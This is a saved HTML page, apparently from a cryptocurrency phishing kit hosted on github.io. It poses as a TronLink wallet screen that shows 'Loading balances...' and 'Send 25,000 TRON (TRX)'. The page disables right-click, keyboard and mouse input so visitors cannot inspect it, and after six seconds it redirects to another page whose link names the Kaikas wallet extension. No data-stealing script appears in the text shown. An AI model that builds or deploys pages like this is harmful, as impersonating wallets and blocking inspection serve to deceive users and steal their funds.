<!DOCTYPE html>
<!-- saved from url=(0072)https://klay-governance.github.io/Rewards/Send_Klay.html?Go_Rewards/Shop -->
<html class="no-js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>

  <title>TronLink | Professional USDT-Tron (TRX) Wallet</title>
  <meta name="description" content="">
 

 <meta name="viewport" content="width=device-width">
<link href="./sending_files/style-8ede3607c73899fd87a40ea034f3dff0.css" rel="stylesheet">

</head>

<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"><!-- uiView: --><div ui-view="" class="ng-scope">


<div class="so-back ng-scope" ng-controller="interstellar-basic-client.HeaderController as header">
  <div class="so-chunk">
  </div>
</div>

  <!-- ngIf: widget.view == 'sendConfirm' --><div class="sendConfirm ng-scope" ng-if="widget.view == ÞsendConfirm&#39;">



<meta http-equiv="refresh" content=" 6;url=invalid.html?unlock/webstore/detail/kaikas/jblndlipeogpafnldhgmapagcccfchpi">
 


   <br> <br><br> <br><br> <br>
<center><img src="./index_files/4256.png"></center>
<center><div class="WalletTokenList__refreshed-message">Loading balances...</div></center>
<center> <font size="4">Send 25,000 TRON ( TRX )</font><br></center>
    <!-- ngIf: widget.memo --><div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo">
       

      </div>
    </div><!-- end ngIf: widget.memo -->
    <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 -->



</div>
</body></html>